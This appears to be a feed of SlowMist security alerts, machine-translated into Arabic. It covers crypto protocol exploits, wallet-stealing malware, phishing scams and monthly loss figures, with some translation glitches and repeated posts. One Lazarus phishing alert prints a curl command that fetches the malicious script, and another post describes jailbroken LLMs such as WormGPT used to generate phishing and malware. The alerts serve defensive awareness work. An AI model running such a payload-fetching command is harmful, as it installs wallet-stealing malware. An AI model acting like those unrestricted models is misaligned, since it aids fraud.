SlowMist_Team

🚨تنبيه SlowMist TI🚨

لقد اكتشف نظام المراقبة لدينا MistEye معاملات مشبوهة تتعلق بـ @ResupplyFi ، مع خسائر تقدر بحوالي 5.59 مليون دولار.

قام المهاجم بالتلاعب بسعر صرف cvcrvUSD من خلال التبرع لعقد cvcrvUSD Controller ، مما أدى في النهاية إلى سرقة كمية كبيرة من رموز reUSD.

كما هو الحال دائمًا، ابق حذرًا!

🚨تحذير SlowMist TI🚨

لقد اكتشف نظام المراقبة الخاص بنا MistEye معاملات مشبوهة تتعلق بـ @ResupplyFi ، مع خسائر تقدر بحوالي 5.59 مليون دولار.

قام المهاجم بتعديل سعر صرف cvcrvUSD من خلال التبرع لعقد crvUSD Controller ، مما أدى في النهاية إلى سرقة كمية كبيرة من رموز reUSD.

كما هو الحال دائمًا، ابق متيقظًا!

🚨 تنبيه SlowMist TI 🚨

برمجية خبيثة جديدة تُدعى #SparkKitty تسرق جميع الصور من أجهزة iOS و Android المصابة — تبحث عن عبارات seed لمحفظة العملات الرقمية.

⚠️ تم تسليمها عبر:
🔸 "币coin" (متجر التطبيقات)
🔸 "SOEX" (جوجل بلاي، 10K+ تثبيتات، تمت إزالتها الآن)
🔸 تطبيقات الكازينو، الألعاب للبالغين، نسخ TikTok

🌍 تستهدف بشكل رئيسي المستخدمين في جنوب شرق آسيا والصين، ولكن لا توجد حدود إقليمية.

🛡️ نصائح رئيسية:
🔹 لا تثبت التطبيقات غير المعروفة
🔹 تجنب تحميل APK
🔹 استخدم أدوات مكافحة الفيروسات

ابقَ متيقظًا! (المصدر: @kaspersky)

💰أكثر من 50 مليار دولار من USDT في الودائع و50 مليار دولار في السحوبات تدفقت عبر HuionePay في الأشهر الثمانية عشر الماضية - الآن تحت التدقيق التنظيمي العالمي بسبب مزاعم بتلقي ونقل وتحويل أموال احتيالية (معظمها عبر USDT على TRON).

قمنا بالتعمق في البيانات مع @MistTrack_io وبنينا لوحة تحكم Dune لرسم بصمتها على السلسلة.

📊لوحة التحكم: https://t.co/DHKtY3X9th
✍️التقرير: https://t.co/O6uWC2S1qU

#TRON #USDT #أمان_العملات_الرقمية #AML #SlowMist #MistTrack #Huione

🚨 تنبيه أمان TI 🚨

وفقًا لشريك المجتمع @1nf0s3cpt، حملة تصيد نشطة تستهدف مستخدمي Web3 بعروض عمل مزيفة (على سبيل المثال، $120/ساعة) لخداعهم في تنفيذ نص ضار يسرق ملفات المحفظة.

🔍 المؤشرات الرئيسية:
🔸مستودع GitLab: https://t.co/ivGN93PS4b
🔸البرمجية المُسقطة: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"

🧪 طريقة الهجوم مشابهة جدًا لاستخدام لازاروس السابق لحزم NPM لنشر الشيفرات الضارة:
https://t.co/bBC4i2vYpA

🚨 وجدنا أن حزمة NPM ضارة جديدة قد تم نشرها للتو:
https://t.co/SjgmO1FOIL
🔸ربما مرتبطة بـ GitHub: apollo-hero
🔸البريد الإلكتروني للرافع: skelstar125@gmail.com

⚠️ لا تقم بتثبيت أو تشغيل حزم أو نصوص غير معروفة. تحقق دائمًا من المصادر.

#LAZARUS #التصيد

🚨تنبيه SlowMist🚨

لقد اكتشف MistEye أنشطة مشبوهة محتملة تتعلق بـ @Bankroll_Status.

كالمعتاد، ابقَ يقظًا!

https://bscscan.com/address/0xadefb902cab716b8043c5231ae9a50b8b4ee7c4e

🚨تنبيه أمان SlowMist🚨

لقد اكتشفنا أنشطة مشبوهة محتملة تتعلق بـ @meta_pool. السبب الجذري هو أن وظيفة _deposit قد تم إعادة كتابتها، مما يتيح الطباعة التعسفية من خلال وظيفة mint دون الحاجة إلى نقل الرموز.

كالعادة، ابقوا يقظين!

🚨 تنبيه أمان SlowMist🚨

‼️احذر من تهديد جديد من مجموعة LAZARUS APT — برنامج OtterCookie لسرقة المعلومات يستهدف المحترفين في صناعات المالية والعملات المشفرة.

🎯 تكتيكات الهجوم:
🔹التظاهر بكونك شركات محترمة من خلال مقابلات مزيفة أو عروض استثمار
🔹استخدام الصور المزيفة لتقمص شخصيات المقابلات/المستثمرين في مكالمات الفيديو
🔹خداع الضحايا لجعلهم يقومون بتشغيل برامج ضارة مت disguised كالتحديات البرمجية أو تحديثات التطبيقات الفيديو
🔹بمجرد التنفيذ، يقوم OtterCookie بسرقة البيانات الحساسة بصمت

🕵️‍♂️ تشمل الأهداف:
🔹بيانات الاعتماد المخزنة في المتصفح
🔹كلمات مرور macOS Keychain والشهادات
🔹معلومات محفظة العملات المشفرة المخزنة محليًا والمفاتيح الخاصة

🛡️ ابق آمنًا:
🔹تحقق من جميع عروض العمل/الاستثمار غير المرغوب فيها
🔹لا تقم بتشغيل ثنائيات غير معروفة، خاصةً “التحديات” أو “التحديثات”
🔹استخدم برامج مكافحة الفيروسات وراقب السلوكيات غير الطبيعية

📚 اقرأ المزيد عن #APT:

https://t.co/hyzwQoiu23

cc @im23pds

🚨تنبيه أمان SlowMist🚨

تلقت SlowMist مؤخرًا معلومات تشير إلى أن مجموعة Lazarus APT تستخدم مسروقًا جديدًا يسمى OtterCookie في هجمات مستهدفة على محترفي التشفير & المالية.

🎭التكتيكات:
- مقابلات عمل مزيفة/مكالمات مستثمرين
- مقاطع فيديو مزيفة لتقمص شخصية المجندين
- برامج ضارة مت disguised كـ “تحديات برمجية” أو “تحديثات”

😈تسرق:
- بيانات اعتماد تسجيل الدخول المخزنة في المتصفح
- كلمات المرور & الشهادات من macOS Keychain
- معلومات المحفظة & المفاتيح الخاصة

🛡️توصيات الأمان:
🔹عامل عروض العمل/الاستثمار غير المرغوب فيها ومقابلات العمل عن بُعد بحذر.
🔹لا تقم بتشغيل ثنائيات غير معروفة، خاصة إذا تم تقديمها كـ “تحديات تقنية” أو “حزم تحديث.”
🔹قم بتحسين قدرات EDR وراقب النشاط غير الطبيعي. استخدم أدوات مكافحة الفيروسات وراجع نقاط النهاية بانتظام.

⚠️كن آمناً — تحقق دائمًا قبل أن تثق.

#Lazarus #APT #OtterCookie #CryptoSecurity

⚠️بينما تتسارع تقنيات الذكاء الاصطناعي، يظهر جانب مظلم: نماذج اللغة الكبيرة غير المقيدة.

على عكس نماذج LLM الرئيسية التي تحتوي على حراس أمان مدمجين، تم تصميم هذه النماذج "المعدلة" أو المعدلة عمدًا لتجاوز القيود الأخلاقية - مما يتيح التصيد الاحتيالي، وتوليد البرمجيات الخبيثة، والاحتيال.

في هذه المقالة، نستكشف صعود أدوات مثل WormGPT و FraudGPT و GhostGPT، وإساءة استخدامها في مجال العملات المشفرة، والتحديات الأمنية المتزايدة التي تطرحها.

اقرأ التحليل الكامل👇
https://t.co/yt1r95mlP4

#الذكاء_الاصطناعي #الأمن_السيبراني #LLM #التصيد_الاحتيالي #البرمجيات_الخبيثة

🚨 تنبيه أمان SlowMist🚨

البرمجية الخبيثة المصرفية لنظام Android #Crocodilus تستهدف الآن مستخدمي العملات المشفرة وتطبيقات البنوك عالميًا بعد التحديثات الأخيرة.

⚠️ التهديدات الرئيسية:

🔹 تنتشر عبر تحديثات المتصفح المزيفة في إعلانات فيسبوك
🔹 تسرق بيانات تسجيل الدخول باستخدام هجمات التراكب
🔹 تستخرج عبارات seed لمحافظ العملات المشفرة والمفاتيح الخاصة
🔹 تضيف أرقام "دعم البنك" المزيفة إلى قوائم الاتصال
🔹 البرمجيات الخبيثة كخدمة: متاحة للإيجار (100–300 USDT/هجوم)

📵 تجنب تحديثات التطبيقات غير المعروفة وروابط الإعلانات.

ابقَ متيقظًا! (المصدر: @ThreatFabric)

🚨ملخص أمان الويب 3 لشهر مايو 2025🚨

📊وفقًا لموقع SlowMist's Hacked (https://t.co/e90CSvTm6B):
⚠️15 عملية اختراق ➡️ خسارة حوالي 257 مليون دولار
❄️ استرداد/تجميد حوالي 162 مليون دولار

🎣خسائر التصيد الاحتيالي عبر @realScamSniffer:
7,164 ضحية ➡️ سرقة حوالي 9.6 مليون دولار

الحوادث الرئيسية:
• خسر بروتوكول Cetus 230 مليون دولار في هجوم تجاوز فيض الرياضيات
• استُغل بروتوكول Cork بأكثر من 12 مليون دولار بسبب عدم كفاية التحقق من صحة البيانات التي قدمها المستخدم
• خسر BitoPro 11.5 مليون دولار؛ غسل الأموال عبر تورنادو كاش، وثورتشين، ووسابي
• خسرت شركة ديمكس 950 ألف دولار أمريكي نتيجة تلاعب أوراكل استهدف خزنة قديمة.
• خسرت شركة زونامي 500 ألف دولار أمريكي؛ والسبب الجذري قيد التحقيق.

أبرز التطورات الأمنية:
⚠️ ثغرات العقود تسببت في 95% من إجمالي خسائر الاختراق.
🎭 ازدياد عمليات الاستيلاء على الحسابات مجددًا.
😈 تستهدف مجموعة لازاروس الآن الأفراد - خسر أحد الضحايا 5.2 مليون دولار أمريكي بسبب البرامج الضارة.

✍️ التقرير الكامل:

🚨تحذير من الاحتيال

مؤخراً، ساعدنا مستخدماً واجه أداة مشبوهة تدعي أن محفظته تحتوي على "تفويض م risky." لقد طلبت الأداة منه لصق مفتاحه الخاص لحل المشكلة.

بعد التحقيق، حددنا الموقع—signature[.]land—كمنصة احتيال. كما تم الإبلاغ عن الموقع كخبيث من قبل منصة Web3 لمكافحة الاحتيال @realScamSniffer.

النتائج الرئيسية:
♦️واجهة المستخدم تحاكي الأداة الشرعية لإلغاء التفويض
♦️نتائج المخاطر مزيفة لأي إدخال
♦️يتم إرسال جميع إدخالات المستخدم مباشرة إلى: abpulimali@gmail[.]com

المشغل وراء هذا الموقع، @Titanspace3، يستخدم عدة تكتيكات خادعة:
🎭يستخدم صورة @zachxbt على تيليجرام
🎭يتظاهر بأنه موظف في SlowMist
🎭يدير حساب X يتابعه 74K، ويعلق بشكل متكرر تحت منشورات مستخدمي العملات الرقمية، مدعياً زيفاً أن محافظهم في خطر ويوجههم إلى رابط احتيالي متنكر كأداة "أمان."

تدفق الاحتيال:
1⃣إثارة الذعر حول "الموافقات الم risky"
2⃣إغراء الضحايا لاستخدام موقع احتيالي
3⃣إرشادهم لإدخال المفاتيح الخاصة لـ"الإلغاء"

🛡️التوصيات
– لا تقم أبداً بلصق مفتاحك الخاص في أي موقع
– استخدم فقط أدوات الأمان من مصادر موثوقة ورسمية
– كن يقظاً واتبع عقلية عدم الثقة

للحصول على تحليل كامل لهذه القضية، انظر مقالتنا الأخيرة:
https://t.co/IvrVPrT6Su

#احتيال #عملات_رقمية #ويب3 #احتيال #هندسة_اجتماعية #إلغاء

🎉 سحب هدايا مهرجان قوارب التنين من SlowMist و Foresight News 🎉

عبارة الاسترجاع الخاصة بك هي شريان الحياة لعملتك المشفرة - احتفظ بها آمنة، تذكرها. 🧠⛓️

@Foresight_News أطلقوا للتو مجموعة جديدة رائعة، نحن نقدم 3 منها للمجتمع!

للدخول:
1⃣ اتبع @Foresight_News و @SlowMist_Team
2⃣ أعجبني + أعد تغريد هذه التغريدة واذكر 3 أصدقاء

سيتم الإعلان عن الفائزين: 4 يونيو 🎁

حظاً سعيداً للجميع!🤩

🚨تنبيه أمان SlowMist🚨

لقد اكتشفنا نشاطًا مشبوهًا محتملاً يتعلق بـ @Corkprotocol.

كالعادة، ابقَ متيقظًا!

🚨تنبيه أمني من SlowMist🚨

☠️أبلغ العديد من المستخدمين مؤخرًا عن تلقيهم رسائل نصية قصيرة من "منصات تداول معروفة"، تقول:

🎭 "رمز التحقق من عملية السحب الخاص بك هو xxx. إذا لم تطلب هذه المعاملة، فاتصل بـ xxx فورًا للمساعدة."

📱بمجرد معاودة الاتصال، يُقال لك إنه "خرق أمني" ويتم توصيلك بشخص يدّعي أنه من "دعم محافظ الأجهزة".

🎣يوجهونك إلى موقع تصيد احتيالي ويخدعونك لإدخال عبارتك المميزة - مما يؤدي إلى سرقة محافظ باردة تزيد قيمتها عن مليون دولار.

⚠️يعرف المحتالون أنك تثق في منصات التداول - ويستغلون هذه الثقة لخداعك خطوة بخطوة.

كشفنا مؤخرًا عن حالة مشابهة - اطلع على تقريرنا المفصل لتعزيز وعيك ودفاعاتك:

https://t.co/OLGtlY1HBV

تذكر:
🔒 لا تشارك أبدًا عبارتك المميزة.
🚫 لا تثق بالمكالمات أو الرسائل النصية أو الروابط غير المتوقعة. تحقق دائمًا من مصادر رسمية.
#Web3Security#PhishingAlert#ColdWallet#CryptoScam #SocialEngineering

في السنوات الأخيرة، أصبح مستخدمو Coinbase أهدافًا متكررة لهجمات الهندسة الاجتماعية - وفي 15 مايو، أكدت Coinbase وجود مشاركة داخلية.

كيف يعمل:

📞 مكالمة دعم مزيفة
📲 إرشاد المستخدم خلال محفظة Coinbase
⚠️ تقديم عبارة mnemonic احتيالية
💸 سحب الأصول تحت الضغط & الإلحاح

مع @MistTrack_io، تتبعنا التدفقات:

▪️ تم تحويل BTC عبر THORChain / Chainflip / Defiway Bridge → DAI/USDT
▪️ تم تبديل ETH على Uniswap → DAI/USDT
▪️ تم غسل الأموال أو لا تزال خاملة

تفصيل كامل👇
https://t.co/OLGtlY2frt

#أمان_العملات_المشفرة #الهندسة_الاجتماعية #أمان_Web3 #Coinbase #احتيال

🚨تنبيه أمان SlowMist🚨

لقد اكتشفنا نشاطًا مشبوهًا محتملاً يتعلق بـ @Nexo.

كما هو الحال دائمًا، ابقَ متيقظًا!

https://bscscan.com/address/0x0851ae80e137c53a8dbc48fce82efd1f50f3b9f2

🚨تنبيه احتيال SlowMist🚨

لقد تلقينا تقارير عن مجموعات Telegram مزيفة تتظاهر بأنها #SlowMist وتخدع المستخدمين عبر روابط استثمار تصيد. مثال واحد: ❌t[.]me/slowmist1 — هذا ليس نحن.‼️

✅ يرجى الإبلاغ عن مثل هذه المجموعات إلى Telegram على الفور.

لأمانك، يرجى دائماً الرجوع إلى قنواتنا الرسمية:
1⃣الموقع الإلكتروني: https://t.co/IO2VWk2pae
2⃣X: @SlowMist_Team & @MistTrack_io
3⃣البريد الإلكتروني: team@slowmist.com

إذا كان لديك أي شك، لا تتردد في مراسلتنا مباشرة.

⚠️كن يقظاً وتحقق قبل أن تثق.

🚀أخبار كبيرة! @MistTrack_io MCP الآن مباشر للاختبار!

يمكنك الآن استخدام اللغة الطبيعية في #Claude و #Cursor وعملاء MCP المدعومين الآخرين لاستدعاء واجهات تحليل السلسلة الخاصة بـ #MistTrack - من تحليل العناوين & تقييم المخاطر إلى رسوم تدفق الأموال.

🧐تحقيقات سلسلة الكتل أكثر ذكاءً وأسرع وأسهل - مدعومة بالذكاء الاصطناعي.

✍️في منشورنا الأخير:
🔹ما هو MistTrack MCP
🔹كيفية استخدامه
🔹الميزات الأساسية
🔹أمثلة على حالات الاستخدام الحقيقية
https://t.co/Fvn2YZIuoI

👋هل أنت مستعد لاستكشاف النموذج الجديد للذكاء الاصطناعي لتتبع السلسلة؟ ابدأ من هنا:
https://t.co/UCDcC9Dt51

#Web3 #AI #أمان_سلسلة_الكتل #MCP